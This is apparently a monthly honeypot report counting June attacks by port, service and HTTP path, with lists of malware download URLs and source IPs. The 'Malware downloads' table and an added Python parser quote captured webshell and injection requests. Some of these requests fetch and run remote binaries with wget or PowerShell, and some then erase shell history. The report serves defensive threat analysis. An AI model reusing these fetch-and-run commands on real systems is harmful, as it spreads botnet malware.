[Monthly Honeypot Analysis] Honeypot, June: traffic to VNC on the rise
This is the June edition of the monthly honeypot analysis. Suricata will also be in place from next month, so I hope to cover its analysis next month as well.
◾️Honeytrap (excluding port 80)
<Detection count>
Detections on 6/9 were high; the cause was a large number of RDP connection attempts sent to port 14791.
Payload:
Cookie: mstshash=Test
Most sudden spikes are RDP traffic. When an attacker can reach RDP from outside, the payoff is large, so I suspect these scans are run on a regular basis.
<Detections by port, change from previous month (Honeytrap)>
Port | Service | Count | Change (prev. month) |
---|---|---|---|
5900 | vnc | 149714 | 128430 |
445 | smb | 106044 | -903 |
23 | telnet | 42814 | -4681 |
110 | pop3 | 29107 | 28940 |
3389 | rdp | 8278 | -28026 |
3306 | mysql | 6438 | 430 |
10630 | Unknown | 6218 | 6215 |
25 | smtp | 3783 | -1410 |
5432 | Unknown | 3300 | -21480 |
2323 | telnet | 2447 | -1128 |
<Detections by port, change from 90-day average (Honeytrap)>
Port | Service | Count | Change (90-day avg.) |
---|---|---|---|
5900 | vnc | 149714 | 109398 |
445 | smb | 106044 | 633 |
23 | telnet | 42814 | -8308 |
110 | pop3 | 29107 | 27848 |
14791 | Unknown | 15851 | 15841 |
3389 | rdp | 8278 | -6869 |
3306 | mysql | 6438 | -3071 |
10630 | Unknown | 6218 | 6215 |
25 | smtp | 3783 | 1182 |
5432 | Unknown | 3300 | -5132 |
Traffic to the VNC and POP3 ports increased. In both cases the connections carried no payload; they were simply checking whether the port was open. For VNC, the rise in detections may be due to BlueKeep, the vulnerability concerning remote access.
The other ports whose service is listed as Unknown were attempts at unauthorized access to RDP.
<Malware downloads, by target>
Target | Count |
---|---|
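As an added example (not the blog's code, and not Honeytrap's), here is how a report could tag those Unknown ports as RDP from the payload itself rather than from the port number. The X.224 builder and the sample records are constructed for the example, and the port table is a simplified stand-in for Honeytrap's own.

```python
"""Tag Honeytrap-style records as RDP from the payload rather than the port.

Honeytrap labels a port from a fixed port-to-service table, so RDP probes aimed
at an unusual port (14791 in the June data) show up as "Unknown".  The X.224
Connection Request that opens an RDP session carries a routing token of the
form "Cookie: mstshash=<username>\r\n", which is exactly the payload the blog
quotes, so matching that token identifies RDP on any port.
"""
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

# Port-to-service table as the blog's own tables present it (assumption: a
# simplified stand-in for Honeytrap's real table).
KNOWN_PORTS: Dict[int, str] = {
    5900: "vnc", 445: "smb", 23: "telnet", 110: "pop3",
    3389: "rdp", 3306: "mysql", 25: "smtp", 2323: "telnet",
}

RDP_COOKIE = b"Cookie: mstshash="


def x224_connection_request(username: str) -> bytes:
    """Build a TPKT-framed X.224 Connection Request like an RDP client sends.

    Used only to construct sample records: TPKT header (version 3, length),
    then the X.224 CR TPDU (LI, CR code 0xE0, DST-REF, SRC-REF, class 0)
    followed by the mstshash routing cookie.
    """
    cookie = RDP_COOKIE + username.encode("ascii") + b"\r\n"
    tpdu_body = b"\xe0" + b"\x00\x00" + b"\x00\x00" + b"\x00" + cookie
    tpdu = bytes([len(tpdu_body)]) + tpdu_body
    return b"\x03\x00" + (len(tpdu) + 4).to_bytes(2, "big") + tpdu


def classify_payload(port: int, payload: bytes) -> str:
    """Service for one record: payload evidence beats the port table."""
    if RDP_COOKIE in payload:
        return "rdp"
    return KNOWN_PORTS.get(port, "unknown")


def rdp_username(payload: bytes) -> Optional[str]:
    """Return the mstshash value (the username the client announced), or None."""
    start = payload.find(RDP_COOKIE)
    if start < 0:
        return None
    start += len(RDP_COOKIE)
    end = payload.find(b"\r\n", start)
    return payload[start:end if end >= 0 else len(payload)].decode("ascii", "replace")


def summarize(records: Iterable[Tuple[int, bytes]]) -> Tuple[List[dict], Counter]:
    """Per-port rows (port-table label next to the payload-inferred service),
    sorted by count, plus a tally of announced RDP usernames."""
    by_port: Dict[int, Counter] = defaultdict(Counter)
    usernames: Counter = Counter()
    for port, payload in records:
        by_port[port][classify_payload(port, payload)] += 1
        user = rdp_username(payload)
        if user is not None:
            usernames[user] += 1
    rows = []
    for port, services in sorted(by_port.items(), key=lambda kv: -sum(kv[1].values())):
        rows.append({
            "port": port,
            "table_service": KNOWN_PORTS.get(port, "Unknown"),
            "inferred": services.most_common(1)[0][0],
            "count": sum(services.values()),
        })
    return rows, usernames


# Constructed sample: RDP probes on 14791 (announcing "Test", as on the blog),
# empty port probes on 5900, and one RDP probe on the standard port.
SAMPLE_RECORDS = (
    [(14791, x224_connection_request("Test"))] * 3
    + [(5900, b"")] * 2
    + [(3389, x224_connection_request("hello"))]
)

if __name__ == "__main__":
    rows, users = summarize(SAMPLE_RECORDS)
    for row in rows:
        print(f"{row['port']:>6} table={row['table_service']:<8} "
              f"inferred={row['inferred']:<8} count={row['count']}")
    print("announced usernames:", dict(users))
```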
Realtek SDK | 713 |
webshell | 87 |
MVPower DVR | 73 |
Huawei Home Device | 71 |
Redis | 59 |
Android Debug Bridge | 53 |
Weblogic | 29 |
Linksys router | 18 |
Apache Struts2 | 12 |
Elasticsearch | 4 |
ZyXEL router | 3 |
AVTECH | 1 |
Most detections were attempts to download Mirai and Gafgyt targeting the Realtek SDK. There were also a fair number of webshell and Redis detections.
◾️WoWHoneypot
<Detection count>
<Detections by target, top 10>
target | count |
---|---|
Tomcat | 7362 |
WordPress | 2138 |
- | 848 |
FreePBX | 732 |
IP camera | 284 |
phpMyAdmin | 167 |
Unauthorized Relay | 137 |
Zabbix | 42 |
ThinkPHP | 15 |
.env file | 14 |
Attempts at unauthorized access to the Tomcat console continued to be detected in large numbers. There were also attacks targeting IP cameras, so attacks aimed at IoT devices appear to be gradually increasing.
<Detected paths, top 10>
wow_path_research | target | CVE | reference | count |
---|---|---|---|---|
/manager/html | Tomcat | - | - | 7362 |
/wp-login.php | WordPress | - | - | 956 |
/ | - | - | - | 795 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 732 |
/tmpfs/auto.jpg | IP camera | - | - | 284 |
/xmlrpc.php | WordPress | - | - | 136 |
/wp5/wp-login.php | WordPress | - | - | 95 |
/wp2/wp-login.php | WordPress | - | - | 93 |
/forum/wp-login.php | WordPress | - | - | 90 |
/wp/wp-login.php | WordPress | - | - | 90 |
Among HTTP paths, unauthorized access to the Tomcat manager was detected far more often than any other path. Beyond that, attacks targeting FreePBX and WordPress were detected frequently.
<Malware downloads>
MalwareDownload | path | payload | count |
---|---|---|---|
hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86 | /awstatstotals/awstatstotals.php | GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close.. | 1 |
hxxp://fid[.]hognoob[.]se/download[.]exe | /public/hydra.php | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. | 1 |
hxxp://fid[.]hognoob[.]se/download[.]exe | /public/index.php | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. | 1 |
hydra.php and index.php are webshells placed by earlier attacks; where such a webshell has been installed, it is used to download the malware. Since the file has an .exe extension, the targeted OS is Windows.
https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369
https://sec-owl.hatenablog.com/entry/2019/01/17/014528
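As an added example (not the blog's code), a small parser that applies the same reasoning to the request lines in the table above: it refangs and URL-decodes the query, pulls out the dropper URL embedded in the command, and infers the target platform from the file extension. The sample request lines are the ones from the table (headers omitted); the extension table beyond .exe is my assumption.

```python
"""Extract the dropper URL and inferred target platform from webshell requests."""
import posixpath
import re
from urllib.parse import unquote, urlsplit


def refang(s: str) -> str:
    """Undo the hxxp:// and [.] defanging used in the tables."""
    return s.replace("hxxps://", "https://").replace("hxxp://", "http://").replace("[.]", ".")


def defang(s: str) -> str:
    """Defang a URL so it cannot be clicked by accident in a report."""
    return s.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


# A URL inside a shell or PowerShell command ends at whitespace, quotes,
# brackets, ';' or ','.
URL_RE = re.compile(r"https?://[^\s'\"<>();,]+")

# Extension -> platform.  ".exe" -> Windows is the blog's own inference; the
# other rows are my assumption based on the binary names in the download list.
PLATFORM_BY_EXT = {
    ".exe": "Windows",
    ".sh": "Linux/Unix (shell dropper)",
    ".x86": "Linux x86",
    ".mips": "Linux MIPS (IoT)",
    ".mpsl": "Linux MIPS little-endian (IoT)",
    ".arm7": "Linux ARMv7 (IoT)",
}


def platform_for(url: str) -> str:
    ext = posixpath.splitext(urlsplit(url).path)[1].lower()
    return PLATFORM_BY_EXT.get(ext, "unknown")


def analyze_request(raw_request: str) -> dict:
    """Parse one request line ('GET /path?query HTTP/1.1', trailing headers ignored)."""
    request_line = raw_request.split(" HTTP/", 1)[0]
    method, _, target = request_line.partition(" ")
    parts = urlsplit(refang(target))
    decoded_query = unquote(parts.query)
    urls = sorted(set(URL_RE.findall(decoded_query)))
    return {
        "method": method,
        "webshell_path": parts.path,          # where the command was sent
        "download_urls": [defang(u) for u in urls],
        "platforms": sorted({platform_for(u) for u in urls}),
        "decoded_query": decoded_query,       # the command as the server saw it
    }


# Request lines from the blog's table (headers omitted, xxx.xxx.xxx.xxx is the
# blog's own placeholder for the honeypot address).
HYDRA_REQUEST = (
    "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)"
    ".DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');"
    "start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1"
)
AWSTATS_REQUEST = (
    "GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20"
    "hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;"
    "%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1"
)
THINKPHP_REQUEST = (
    r"GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array"
    r"&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient)"
    r".DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');"
    r"start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1"
)

if __name__ == "__main__":
    for req in (HYDRA_REQUEST, AWSTATS_REQUEST, THINKPHP_REQUEST):
        result = analyze_request(req)
        print(result["webshell_path"], result["download_urls"], result["platforms"])
```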
<IoC information>
WoWHoneypot
path | target | CVE | reference |
<Malware downloads>
Destination port | Download URL | Source IP |
---|---|---|
5555 | hxxp://185[.]99[.]254[.]29/bins/arm7 | 104[.]251[.]122[.]37 |
5555 | hxxp://185[.]99[.]254[.]29/bins/x86 | 104[.]251[.]122[.]37 |
5555 | hxxp://185[.]99[.]254[.]29/bins/x86 | 104[.]251[.]122[.]37 |
5555 | hxxp://209[.]97[.]163[.]186/c | 112[.]170[.]69[.]163 |
5555 | hxxp://68[.]183[.]39[.]48/icy[.]sh | 182[.]254[.]168[.]229 |
5555 | hxxp://87[.]120[.]254[.]184/curl1 | 185[.]164[.]72[.]227 |
5555 | hxxp://87[.]120[.]254[.]184/curl1 | 80[.]82[.]70[.]43 |
6379 | hxxp://w[.]lazer-n[.]com:43768/lll[.]sh | 119[.]253[.]84[.]102 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 123[.]157[.]252[.]90 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 123[.]157[.]252[.]90 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 129[.]213[.]50[.]59 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 129[.]213[.]50[.]59 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 143[.]107[.]73[.]221 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 143[.]107[.]73[.]221 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 177[.]191[.]190[.]174 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 177[.]191[.]190[.]174 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 183[.]89[.]159[.]107 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 183[.]89[.]159[.]107 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 191[.]5[.]245[.]144 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 191[.]5[.]245[.]144 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 191[.]55[.]142[.]52 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 191[.]55[.]142[.]52 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 213[.]150[.]178[.]174 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 213[.]150[.]178[.]174 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 221[.]230[.]132[.]58 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 36[.]91[.]102[.]138 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 36[.]91[.]102[.]138 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 36[.]91[.]102[.]138 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 36[.]91[.]102[.]138 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 5[.]1[.]38[.]129 |
7001 | hxxp://fid[.]hognoob[.]se/download[.]exe | 5[.]1[.]38[.]129 |
8000 | hxxp://209[.]141[.]40[.]213/avtech | 209[.]52[.]149[.]41 |
8000 | hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips | 159[.]203[.]18[.]21 |
8060 | hxxp://fid[.]hognoob[.]se/download[.]exe | 165[.]56[.]0[.]30 |
8080 | hxxp://134[.]209[.]183[.]3/akbins/mpsl[.]akira[.]ak | 134[.]209[.]28[.]200 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 109[.]124[.]148[.]167 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 121[.]179[.]46[.]82 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 124[.]133[.]108[.]34 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 148[.]63[.]18[.]12 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 182[.]34[.]123[.]90 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 213[.]192[.]56[.]195 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 222[.]218[.]220[.]101 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 46[.]105[.]209[.]48 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 66[.]168[.]88[.]53 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 83[.]29[.]229[.]22 |
8080 | hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl | 93[.]100[.]110[.]69 |
8080 | hxxp://fid[.]hognoob[.]se/download[.]exe | 143[.]0[.]151[.]173 |
8080 | hxxp://fid[.]hognoob[.]se/download[.]exe | 143[.]0[.]151[.]173 |
8080 | hxxp://hulo[.]r00ts[.]online/[.]config/Lrep | 122[.]116[.]216[.]224 |
8080 | hxxp://hulo[.]r00ts[.]online/FleX/Lrep | 118[.]232[.]136[.]122 |
8080 | hxxp://hulo[.]r00ts[.]online/FleX/Lrep | 88[.]249[.]249[.]27 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 120[.]236[.]87[.]152 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 120[.]236[.]87[.]152 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 120[.]236[.]87[.]152 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 41[.]226[.]251[.]178 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 41[.]226[.]251[.]178 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 85[.]105[.]111[.]237 |
8088 | hxxp://fid[.]hognoob[.]se/download[.]exe | 85[.]105[.]111[.]237 |
8111 | hxxp://fid[.]hognoob[.]se/download[.]exe | 40[.]68[.]131[.]225 |
8111 | hxxp://fid[.]hognoob[.]se/download[.]exe | 40[.]68[.]131[.]225 |
8111 | hxxp://fid[.]hognoob[.]se/download[.]exe | 40[.]68[.]131[.]225 |
9200 | hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh | 3[.]213[.]101[.]190 |
9200 | hxxp://216[.]176[.]179[.]106:9090/26006\ | 202[.]109[.]143[.]110 |
9888 | hxxp://fid[.]hognoob[.]se/download[.]exe | 185[.]48[.]149[.]115 |
9999 | hxxp://fid[.]hognoob[.]se/download[.]exe | 218[.]62[.]29[.]165 |
9999 | hxxp://fid[.]hognoob[.]se/download[.]exe | 218[.]62[.]29[.]165 |
9999 | hxxp://fid[.]hognoob[.]se/download[.]exe | 43[.]254[.]125[.]41 |
9999 | hxxp://fid[.]hognoob[.]se/download[.]exe | 43[.]254[.]125[.]41 |
37215 | 103[.]83[.]157[.]41 | 142[.]93[.]113[.]113 |
37215 | 104[.]248[.]93[.]159 | 68[.]183[.]151[.]62 |
37215 | 157[.]230[.]173[.]232 | 145[.]239[.]168[.]176 |
37215 | 157[.]230[.]173[.]232 | 37[.]6[.]230[.]115 |
37215 | 157[.]230[.]173[.]232 | 79[.]107[.]238[.]19 |
37215 | 157[.]230[.]173[.]232 | 79[.]107[.]244[.]144 |
37215 | 159[.]203[.]21[.]20 | 77[.]42[.]104[.]114 |
37215 | 159[.]65[.]240[.]150 | 88[.]36[.]135[.]138 |
37215 | 159[.]89[.]38[.]57 | 106[.]13[.]52[.]123 |
37215 | 178[.]62[.]112[.]14 | 60[.]8[.]213[.]120 |
37215 | 178[.]62[.]114[.]122 | 151[.]30[.]69[.]79 |
37215 | 178[.]62[.]114[.]122 | 199[.]182[.]137[.]148 |
37215 | 178[.]62[.]114[.]122 | 212[.]210[.]31[.]47 |
37215 | 178[.]62[.]114[.]122 | 37[.]130[.]113[.]38 |
37215 | 178[.]62[.]114[.]122 | 79[.]12[.]199[.]206 |
37215 | 185[.]244[.]25[.]235 | 149[.]129[.]132[.]231 |
37215 | 185[.]244[.]25[.]235 | 34[.]85[.]97[.]138 |
37215 | 185[.]244[.]25[.]235 | 47[.]92[.]54[.]63 |
37215 | 206[.]189[.]170[.]165 | 151[.]24[.]171[.]42 |
37215 | 206[.]189[.]170[.]165 | 151[.]30[.]33[.]254 |
37215 | 206[.]189[.]170[.]165 | 151[.]30[.]62[.]96 |
37215 | 206[.]189[.]170[.]165 | 151[.]32[.]113[.]220 |
37215 | 206[.]189[.]170[.]165 | 151[.]32[.]61[.]221 |
37215 | 206[.]189[.]170[.]165 | 151[.]52[.]39[.]144 |
37215 | 206[.]189[.]170[.]165 | 151[.]64[.]117[.]217 |
37215 | 206[.]189[.]170[.]165 | 212[.]19[.]112[.]212 |
37215 | 206[.]189[.]170[.]165 | 212[.]19[.]116[.]205 |
37215 | 206[.]189[.]170[.]165 | 79[.]23[.]98[.]90 |
37215 | 206[.]189[.]170[.]165 | 79[.]47[.]184[.]216 |
37215 | 206[.]189[.]170[.]165 | 79[.]52[.]2[.]81 |
37215 | 209[.]141[.]43[.]15 | 220[.]127[.]239[.]7 |
37215 | 209[.]97[.]136[.]57 | 85[.]134[.]12[.]144 |
37215 | 37[.]49[.]225[.]230 | 37[.]202[.]111[.]58 |
37215 | 37[.]49[.]225[.]230 | 37[.]202[.]127[.]16 |
37215 | 37[.]49[.]225[.]230 | 46[.]185[.]139[.]32 |
37215 | 68[.]183[.]39[.]48 | 68[.]183[.]151[.]62 |
37215 | 68[.]183[.]39[.]48 | 68[.]183[.]151[.]62 |
37215 | 89[.]190[.]159[.]189 | 151[.]40[.]20[.]117 |
37215 | 89[.]190[.]159[.]189 | 151[.]49[.]112[.]101 |
37215 | 89[.]190[.]159[.]189 | 152[.]171[.]67[.]142 |
37215 | 89[.]190[.]159[.]189 | 188[.]136[.]243[.]230 |
37215 | 89[.]190[.]159[.]189 | 79[.]46[.]88[.]134 |
37215 | 89[.]190[.]159[.]189 | 80[.]15[.]216[.]26 |
37215 | 89[.]34[.]26[.]202 | 174[.]138[.]0[.]191 |
37215 | 89[.]46[.]223[.]195 | 162[.]255[.]122[.]178 |
37215 | hxxp://213[.]166[.]69[.]64 | 174[.]138[.]5[.]118 |
52869 | hxxp://174[.]128[.]226[.]101/kr | 185[.]101[.]105[.]192 |
52869 | hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips | 188[.]166[.]48[.]241 |
52869 | hxxp://213[.]166[.]69[.]64/akbins/mips[.]akirag | 174[.]138[.]0[.]191 |
55555 | ftp -r | 185[.]172[.]110[.]246 |
60001 | hxxp:/\/178[.]33[.]181[.]23/infect | 167[.]86[.]77[.]222 |
60001 | hxxp:/\/178[.]33[.]181[.]23/sh | 167[.]86[.]77[.]222 |
60001 | hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh | 45[.]8[.]159[.]175 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 1[.]4[.]188[.]23 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 101[.]108[.]98[.]16 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 103[.]133[.]64[.]68 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 104[.]205[.]11[.]120 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 108[.]30[.]142[.]74 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 112[.]119[.]70[.]4 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 112[.]243[.]249[.]179 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 113[.]231[.]104[.]95 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 114[.]203[.]95[.]52 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 115[.]96[.]156[.]121 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 118[.]81[.]99[.]146 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 120[.]1[.]136[.]29 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 125[.]26[.]203[.]175 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 151[.]70[.]197[.]241 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 163[.]158[.]203[.]173 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 175[.]151[.]238[.]175 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 178[.]221[.]57[.]209 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 182[.]180[.]121[.]222 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 185[.]18[.]46[.]110 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 188[.]49[.]46[.]158 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 189[.]26[.]196[.]203 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 190[.]221[.]92[.]136 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 191[.]243[.]231[.]64 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 196[.]229[.]230[.]251 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 197[.]0[.]168[.]186 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 2[.]89[.]166[.]11 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 219[.]139[.]232[.]108 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 222[.]72[.]116[.]147 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 27[.]192[.]11[.]108 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 27[.]76[.]50[.]21 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 35[.]199[.]147[.]245 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 37[.]202[.]100[.]185 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 39[.]44[.]40[.]234 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 39[.]45[.]138[.]80 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 41[.]138[.]117[.]19 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 41[.]143[.]237[.]2 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 42[.]53[.]118[.]250 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 5[.]219[.]171[.]187 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 5[.]236[.]217[.]102 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 58[.]10[.]74[.]65 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 61[.]175[.]101[.]165 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 68[.]194[.]230[.]145 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 93[.]46[.]58[.]233 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 93[.]81[.]10[.]51 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 94[.]231[.]164[.]168 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 95[.]137[.]251[.]164 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 95[.]219[.]163[.]24 |
60001 | hxxp:/\/185[.]244[.]25[.]241/b/arm7 | 95[.]249[.]151[.]66 |
That concludes this month's report.